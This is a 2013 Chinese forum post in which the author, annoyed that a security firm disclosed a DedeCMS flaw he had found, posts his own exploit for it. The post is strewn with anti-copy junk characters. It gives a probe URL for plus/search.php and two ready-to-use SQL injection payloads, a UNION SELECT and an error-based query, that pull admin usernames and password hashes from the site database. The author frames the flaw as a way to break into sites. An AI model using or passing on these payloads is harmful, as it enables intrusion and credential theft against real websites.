转载不加作者名的没JJ
7 @! Q* Z+ i) r4 _4 l0 _: ]1 ~( @5 ~) `6 e6 v
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
: D5 D! A. n* i7 _- {# l3 J1 F. Y9 ^' o5 t P0 ?
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
' r& e' U7 O1 A; }8 d; X( Y7 y7 q% y; g6 U' G- C: H
我一般是这样测试的:5 g( R$ \2 `6 L- d5 ^4 ]! O
1 Q. l. K: d7 |- e# Q
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
6 D. M- z- y1 K* j# v4 p
+ L2 A8 l5 Z4 M+ r% I/ c1 a转载不加作者名的没JJ' L% i: m& p3 W7 m6 X
, j! W& D6 \9 J, m作者:鬼哥
' V/ ~- J& H) @" M
, l E* J- U$ N Q " Q* H d# q, |9 Q
; Y& Q5 z" k- x- g) G. b8 X看结果如果提示; S- G4 Y9 G. L, m! @% ?
. j+ H1 M( X- L. t$ H$ iSafe Alert: Request Error step 2 !, @& `% u" k, _ V) k
. Z+ w, D( @! [
那么直接用下面的exp" _2 K7 P. W7 Q& V0 d& ]1 J {: `8 P5 r
( q0 D! `$ S. [! N8 H$ Cxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a7 C% c% |2 W; R5 ~ S- Y4 ~3 y; c& E
- t# A( i0 S, {0 W1 U4 d
/ R$ U5 a! g: T' @0 Y, t$ s看结果如果提示- k7 p5 ~# \/ g0 R+ U8 G
; |( K9 p' S8 n
Safe Alert: Request Error step 1 !/ T; M8 s7 e7 L& e) b* I- w" _
( b1 I4 Y) |, H4 m. Z# N, m那么直接用下面的exp' `8 I, Y& {/ O. n5 ~# _+ H
3 B7 A8 U+ l! x
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
& d/ O. I' W* J% |. g: h% H0 ^+ q2 {+ Z# d
6 K t5 J& ~+ b; I
如果正常显示证明漏洞不存在了。$ ]& N: s* J! C5 H
! g& l$ e( {$ L( J转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对